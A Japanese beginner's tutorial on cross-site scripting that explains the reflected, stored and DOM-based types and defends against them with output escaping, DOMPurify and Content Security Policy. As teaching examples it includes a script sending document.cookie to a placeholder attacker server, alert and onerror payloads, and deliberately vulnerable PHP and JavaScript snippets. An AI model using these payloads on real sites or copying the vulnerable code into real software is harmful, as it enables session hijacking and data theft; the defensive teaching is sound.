フリーキーズ | 独学プログラミング

XSS対策完全ガイド!クロスサイトスクリプティング攻撃から守る基本と実践

リンドくん

リンドくん

たなべ先生、「XSS攻撃」って言葉をよく聞くんですけど、これって何ですか?
自分のWebサイトも危ないんでしょうか...

たなべ

たなべ

XSSはクロスサイトスクリプティングの略で、Webアプリケーションの代表的な脆弱性の一つなんだ。
実は、適切な対策をしないと、ユーザーの個人情報が盗まれたり、サイトが改ざんされたりする危険性があるんだよ。

Webアプリケーション開発を学び始めると、必ず向き合うことになるのが「セキュリティ対策」です。
その中でも特に重要なのがXSS(クロスサイトスクリプティング)対策です。

XSSは、OWASP Top 10(Webアプリケーションの最も危険な脆弱性トップ10)にも常にランクインする、非常に一般的でありながら深刻な脅威です。しかし、適切な知識と対策を身につければ、確実に防ぐことができる攻撃でもあります。

この記事では、XSSとは何か、どのような危険性があるのか、そしてどう対策すればよいのかを、初心者の方にもわかりやすく解説していきます。

プログラミング学習でお悩みの方へ

HackATAは、エンジニアを目指す方のためのプログラミング学習コーチングサービスです。 経験豊富な現役エンジニアがあなたの学習をサポートします。

✓ 質問し放題

✓ β版公開中(2025年内の特別割引)

HackATAの詳細を見る

XSS(クロスサイトスクリプティング)とは何か

リンドくん

リンドくん

そもそも「クロスサイトスクリプティング」ってどういう意味なんですか?なんだか難しそう...

たなべ

たなべ

名前は難しく聞こえるけど、仕組みは意外とシンプルなんだ。
簡単に言うと、攻撃者が悪意のあるスクリプトをWebページに埋め込んで、他のユーザーに実行させる攻撃のことなんだよ。

XSSの基本概念

XSS(Cross-Site Scripting)は、Webアプリケーションの入力検証やサニタイゼーション(無害化処理)が不十分な場合に発生する脆弱性です。
攻撃者は、この脆弱性を利用して悪意のあるJavaScriptコードをWebページに注入し、他のユーザーのブラウザ上で実行させることができます。

なぜ「XSS」と略すのか気になる方もいらっしゃるかもしれません。実は、CSS(Cascading Style Sheets)との混同を避けるため、Cross-Site Scriptingの頭文字ではなく「XSS」という略称が使われるようになったんです。

XSS攻撃で何ができてしまうのか

XSS攻撃が成功すると、攻撃者は以下のような危険な行為を実行できてしまいます。

  • Cookie(クッキー)の盗み出し - セッションIDを盗んで、ユーザーになりすます
  • 個人情報の窃取 - フォームに入力された情報を盗み取る
  • ページの改ざん - 偽のログイン画面を表示して認証情報を盗む
  • フィッシング攻撃 - 信頼されているサイトを利用して詐欺サイトへ誘導
  • マルウェアの配布 - ユーザーのコンピュータに悪意のあるソフトウェアをインストール

これらの攻撃は、正規のWebサイト上で実行されるため、ユーザーは「いつも使っている安全なサイト」だと信じて操作してしまうのです。これがXSS攻撃の最も恐ろしい点と言えるでしょう。

XSSの具体的な攻撃例

実際にどのような攻撃が行われるのか、簡単な例を見てみましょう。

例えば、以下のような掲示板アプリケーションがあるとします。

<!-- 脆弱なコード例(絶対に真似しないでください) -->
<div class="comment">
    <?php echo $_POST['comment']; ?>
</div>

このコードでは、ユーザーが入力したコメントをそのまま表示しています。攻撃者がコメント欄に以下のような入力をすると、どうなるでしょうか?

<script>
    // Cookieを攻撃者のサーバに送信
    document.location = 'http://____.com/steal.php?cookie=' + document.cookie;
</script>

この悪意のあるスクリプトがページに埋め込まれると、そのページを見た他のユーザーのブラウザ上で自動的に実行され、Cookieが攻撃者のサーバに送信されてしまいます。

これは非常にシンプルな例ですが、XSS攻撃の基本的な仕組みを理解していただけたのではないでしょうか。

XSSの種類を理解しよう

リンドくん

リンドくん

XSSにも種類があるんですか?

たなべ

たなべ

そうなんだ。大きく分けて3つのタイプがあって、それぞれ攻撃の仕組みや対策方法が少し違うんだよ。

XSS攻撃は、攻撃の仕組みによって主に3つのタイプに分類されます。それぞれの特徴を理解することで、より効果的な対策を講じることができます。

反射型XSS(Reflected XSS)

反射型XSSは、最も一般的なタイプのXSS攻撃です。
攻撃者が作成した悪意のあるURLをユーザーにクリックさせることで攻撃が成立します。

攻撃の流れ

  1. 攻撃者が悪意のあるスクリプトを含むURLを作成
  2. メールやSNSなどでユーザーにそのURLを送る
  3. ユーザーがURLをクリック
  4. スクリプトがサーバから「反射」されてユーザーのブラウザで実行される

例えば、検索機能を持つサイトで以下のようなURLが考えられます。

https://____.com/search?q=<script>alert('XSS')</script>

検索結果ページで検索キーワードをそのまま表示している場合、このスクリプトが実行されてしまいます。

格納型XSS(Stored XSS)

格納型XSSは、悪意のあるスクリプトがデータベースなどに保存され、ページを閲覧したすべてのユーザーに影響を与えるタイプです。
反射型よりも危険性が高いと言われています。

攻撃の流れ

  1. 攻撃者が掲示板やコメント欄などに悪意のあるスクリプトを投稿
  2. スクリプトがデータベースに保存される
  3. 他のユーザーがそのページを閲覧
  4. 保存されていたスクリプトが実行される

先ほど紹介した掲示板の例が、まさに格納型XSSの典型例です。一度投稿されたスクリプトは、そのページを見るすべてのユーザーに影響を与え続けるため、被害が拡大しやすいのが特徴です。

DOM Based XSS

DOM Based XSSは、JavaScriptでDOMを操作する際に発生する脆弱性を利用した攻撃です。
サーバ側の処理を経由せず、クライアント側のJavaScriptのみで攻撃が完結します。

例えば、以下のようなコードは脆弱です。

// 脆弱なコード例(絶対に真似しないでください)
var name = location.hash.substring(1);
document.getElementById('welcome').innerHTML = 'Welcome ' + name;

このコードに対して、以下のようなURLでアクセスすると攻撃が成立します。

https://____.com/welcome.html#<img src=x onerror=alert('XSS')>

DOM Based XSSは、サーバ側のログに残らないため、検知が難しいという特徴があります。

XSS対策の基本原則

リンドくん

リンドくん

XSSって怖いですね...どうすれば防げるんですか?

たなべ

たなべ

大丈夫!基本的な対策をしっかり実施すれば、XSSは確実に防げるんだ。
最も重要なのは、ユーザーからの入力を絶対に信頼しないことだよ。

XSS対策の基本は、入力されたデータを適切に処理してから出力することです。具体的には以下の3つの原則を守ることが重要です。

1. エスケープ処理(エンコーディング)

エスケープ処理とは、HTMLやJavaScriptで特別な意味を持つ文字を、無害な文字列に変換することです。これがXSS対策の最も基本的かつ重要な手法です。

HTMLで特別な意味を持つ文字として、以下のようなものがあります。

  • <&lt;
  • >&gt;
  • "&quot;
  • '&#x27;
  • &&amp;

例えば、PHPでは以下のようにエスケープ処理を行います。

<?php
// 正しいコード例
$comment = htmlspecialchars($_POST['comment'], ENT_QUOTES, 'UTF-8');
echo $comment;
?>

htmlspecialchars()関数は、特殊文字をHTMLエンティティに変換してくれます。
これにより、たとえ<script>タグが入力されても、ブラウザはそれをスクリプトとして実行せず、単なるテキストとして表示します。

2. サニタイゼーション(無害化処理)

サニタイゼーションは、入力データから危険な要素を取り除く処理です。特にHTMLを許可する必要がある場合(リッチテキストエディタなど)に重要になります。

JavaScriptでは、DOMPurifyなどのライブラリを使用することで、安全にHTMLをサニタイズできます。

// DOMPurifyを使用した例
import DOMPurify from 'dompurify';

const userInput = '<img src=x onerror=alert("XSS")>';
const clean = DOMPurify.sanitize(userInput);
// 結果: <img src="x">(onerror属性は削除される)

3. コンテンツセキュリティポリシー(CSP)

CSP(Content Security Policy)は、HTTPレスポンスヘッダーでスクリプトの実行ルールを指定することで、XSS攻撃を防ぐ仕組みです。

例えば、以下のようなヘッダーを設定すると、インラインスクリプトの実行を禁止できます。

Content-Security-Policy: script-src 'self'

これにより、外部から注入されたインラインスクリプトは実行されなくなります。CSPは多層防御の一環として非常に効果的です。

よくある間違いと注意点

リンドくん

リンドくん

エスケープさえすれば完璧なんですか?

たなべ

たなべ

それだけじゃ不十分な場合もあるんだ。
コンテキストに応じた適切な対策が必要なんだよ。

XSS対策でよくある間違いと、それを避けるための注意点を紹介します。

間違い① エスケープの場所を間違える

// 間違った例
$unsafe = $_POST['data'];
// データベースに保存する前にエスケープ(誤り)
$escaped = htmlspecialchars($unsafe, ENT_QUOTES, 'UTF-8');
$db->save($escaped);

// 正しい例
$data = $_POST['data'];
// そのままデータベースに保存
$db->save($data);
// 出力時にエスケープ
echo htmlspecialchars($data, ENT_QUOTES, 'UTF-8');

エスケープは出力時に行うのが正しい方法です。保存時にエスケープすると、データが二重にエスケープされたり、表示が崩れたりする問題が発生します。

間違い② コンテキストを考慮しない

HTMLの属性値、JavaScript内、URLなど、出力する場所によって適切なエスケープ方法が異なります。

<!-- HTMLコンテキスト -->
<div><?php echo htmlspecialchars($data, ENT_QUOTES, 'UTF-8'); ?></div>

<!-- JavaScript文字列コンテキスト -->
<script>
var name = <?php echo json_encode($data); ?>;
</script>

<!-- URL属性コンテキスト -->
<a href="<?php echo htmlspecialchars($url, ENT_QUOTES, 'UTF-8'); ?>">Link</a>

それぞれのコンテキストに応じた適切な処理が必要です。

間違い③ クライアント側だけで検証する

// これだけでは不十分
function validateInput(input) {
  if (input.includes('<script>')) {
    return false;
  }
  return true;
}

クライアント側の検証は簡単に回避できるため、必ずサーバ側でも検証・エスケープ処理を行う必要があります。

まとめ

リンドくん

リンドくん

XSS対策、思ったより奥が深いですね...でも基本はわかりました!

たなべ

たなべ

その通り!最初は難しく感じるかもしれないけど、基本原則を守れば確実に防げるんだ。
これからのWeb開発では、セキュリティを最優先に考える習慣をつけてほしいな。

この記事では、XSS(クロスサイトスクリプティング)について、基本概念から実践的な対策まで解説してきました。

重要なポイントをおさらいしましょう。

  • XSSは3つのタイプがある - 反射型、格納型、DOM Basedそれぞれの特徴を理解する
  • 基本原則は「入力を信頼しない」 - すべてのユーザー入力を疑う姿勢が重要
  • 出力時に適切なエスケープ処理 - コンテキストに応じた正しいエスケープを行う
  • 多層防御が効果的 - エスケープ、サニタイゼーション、CSPを組み合わせる
  • フレームワークの機能を活用 - 多くの現代的なフレームワークは自動的にXSS対策を施してくれる

XSS対策は、Webアプリケーション開発において絶対に省略できない重要な要素です。
一度習慣として身につけてしまえば、自然とセキュアなコードが書けるようになります。

また、セキュリティは常に進化する分野です。
新しい攻撃手法や対策技術が日々生まれています。OWASP(Open Web Application Security Project)などの信頼できる情報源を定期的にチェックし、最新のセキュリティ知識を更新し続けることをおすすめします。

この記事をシェア

関連するコンテンツ